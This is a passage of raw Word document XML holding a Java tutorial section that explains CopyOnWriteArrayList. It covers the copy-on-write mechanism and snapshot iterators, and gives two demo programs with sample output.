    <w:p w14:paraId="23BB3B23" w14:textId="77777777" w:rsidR="00EE66E8" w:rsidRPr="004F2440" w:rsidRDefault="00EE66E8" w:rsidP="00EE66E8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F2440">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="7D0B5E73">
          <v:rect id="_x0000_i3930" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D87FAF"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6" w:name="_Toc197867400"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explain </w:t>
      </w:r>
      <w:r w:rsidRPr="004F2440">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>CopyOnWriteArrayList?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="186"/>
    </w:p>
    <w:p w14:paraId="7BA29ED5" w14:textId="2BEA800D" w:rsidR="00640264" w:rsidRPr="00640264" w:rsidRDefault="00640264" w:rsidP="00640264">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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a </w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thread-safe variant of ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>java.util.concurrent</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> package. It is optimized for scenarios where </w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read operations are more frequent than write operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B454E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2899E080">
          <v:rect id="_x0000_i6953" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29290D30"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5741"/>
      </w:tblGrid>
      <w:tr w:rsidR="00640264" w:rsidRPr="00640264" w14:paraId="046F30C9" w14:textId="77777777" w:rsidTr="00640264">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26EBAEEC"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haracteristic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AA26E53"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5F2E5266" w14:textId="77777777" w:rsidTr="00640264">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38AF3F3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ackage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3618598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java.util.concurrent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00640264" w:rsidRPr="00640264" w14:paraId="0C3048B3" w14:textId="77777777" w:rsidTr="00640264">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F1BF72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3EE5AD2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Yes (achieved using </w:t>
            </w:r>
            <w:r w:rsidRPr="00640264">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>copy-on-write</w:t>
            </w:r>
            <w:r w:rsidRPr="00640264">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> strategy)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00640264" w:rsidRPr="00640264" w14:paraId="438E3F31" w14:textId="77777777" w:rsidTr="00640264">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3361AF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Null Values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45A41A3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llowed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00640264" w:rsidRPr="00640264" w14:paraId="1ECFF2C0" w14:textId="77777777" w:rsidTr="00640264">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="431B0FC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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0038D1A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 read operations, slow write operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00640264" w:rsidRPr="00640264" w14:paraId="2C3F6B16" w14:textId="77777777" w:rsidTr="00640264">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AA065A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Data Consistency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="666783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Iterators provide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data at the time of iteration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00640264" w:rsidRPr="00640264" w14:paraId="4D8C4D8D" w14:textId="77777777" w:rsidTr="00640264">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17FBED3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Best Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36C8B9C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hen reads are more frequent than writes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A880BE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324661AC">
          <v:rect id="_x0000_i6954" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="703CF25B"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2. How Does It Work?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2A86A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Copy-on-Write Mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137D2078"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Whenever a </w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>modification</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (add, remove, update) occurs, the list creates a </w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new copy</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the entire underlying array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4253670C"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is ensures that </w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reading threads</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are not blocked or affected during modification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A50DD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Read Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B104905"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Use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>original copy</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> without locking, ensuring </w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACE17D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Write Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F755079"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reate a </w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new copy</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, modify it, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>replace</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the old array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429D02B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Iterators:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7E926F"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 iterators are </w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fail-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning they do not throw ConcurrentModificationException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC45F47" w14:textId="77777777" w:rsidR="00640264" w:rsidRPr="00640264" w:rsidRDefault="00640264" w:rsidP="00640264">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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y work on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list at the time the iterator was created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E87EE0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511DCEC9">
          <v:rect id="_x0000_i6955" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC43899"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3. Creating a CopyOnWriteArrayList:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BC112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mport java.util.concurrent.CopyOnWriteArrayList;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEC1C7A" w14:textId="77777777" w:rsidR="00640264" w:rsidRPr="00640264" w:rsidRDefault="00640264" w:rsidP="00640264">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F0D5D7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public class CopyOnWriteArrayListDemo {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC6B23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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AE91C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CopyOnWriteArrayList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1AB3C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CopyOnWriteArrayList&lt;String&gt; list = new CopyOnWriteArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6F3C73" w14:textId="77777777" w:rsidR="00640264" w:rsidRPr="00640264" w:rsidRDefault="00640264" w:rsidP="00640264">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C6EBDE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Adding elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7719C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Java");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37240A1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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        list.add("Python");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA3A2F7"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Scala");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAFC7AE" w14:textId="77777777" w:rsidR="00640264" w:rsidRPr="00640264" w:rsidRDefault="00640264" w:rsidP="00640264">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E8C320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Displaying the list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136926B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List: " + list);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440010F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51982B6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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C4D29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7F92E3E9">
          <v:rect id="_x0000_i6956" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACF1CE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4. Example: Concurrent Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7695B3E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mport java.util.concurrent.CopyOnWriteArrayList;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68234582" w14:textId="77777777" w:rsidR="00640264" w:rsidRPr="00640264" w:rsidRDefault="00640264" w:rsidP="00640264">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C2E8D0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public class ConcurrentAccessDemo {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E5289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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4253545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CopyOnWriteArrayList&lt;String&gt; list = new CopyOnWriteArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D86B60" w14:textId="77777777" w:rsidR="00640264" w:rsidRPr="00640264" w:rsidRDefault="00640264" w:rsidP="00640264">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="369BF17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Adding elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178AD61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Apple");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4444203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Banana");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04950BD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Cherry");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F313FC" w14:textId="77777777" w:rsidR="00640264" w:rsidRPr="00640264" w:rsidRDefault="00640264" w:rsidP="00640264">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C529A3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thread that iterates over the list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F2160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new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D42F3C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for (String fruit : list) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8F548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Reading: " + fruit);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AB08E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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5981466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sleep(50); // Simulate some delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F77D2D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atch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E1272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currentThread().interrupt();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A7C5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095E2F5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7D4BBD3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tart();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA74DFC" w14:textId="77777777" w:rsidR="00640264" w:rsidRPr="00640264" w:rsidRDefault="00640264" w:rsidP="00640264">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7667966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reating a thread that modifies the list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0125A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new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0DB7C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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4F435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sleep(100);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD79E2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list.add("Date");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDBECF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ystem.out.println("Added: Date");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1E26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 catch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC56DB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Thread.currentThread().interrupt();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500EA3F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5CB584E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start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB7D4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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396D879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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F8526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413E5B41">
          <v:rect id="_x0000_i6957" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="067DEE05"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5. Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2820FCE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Apple  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1493D20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Banana  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ED771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ading: Cherry  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FF773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Added: Date  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408C5C9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The iterator does </w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not reflect</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the added element </w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"Date"</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because it works on a </w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>snapshot</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C97CE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103F9EF6">
          <v:rect id="_x0000_i6958" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CA800A"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6. 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gridCol w:w="4914"/>
      </w:tblGrid>
      <w:tr w:rsidR="00640264" w:rsidRPr="00640264" w14:paraId="29A5391B" w14:textId="77777777" w:rsidTr="00640264">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
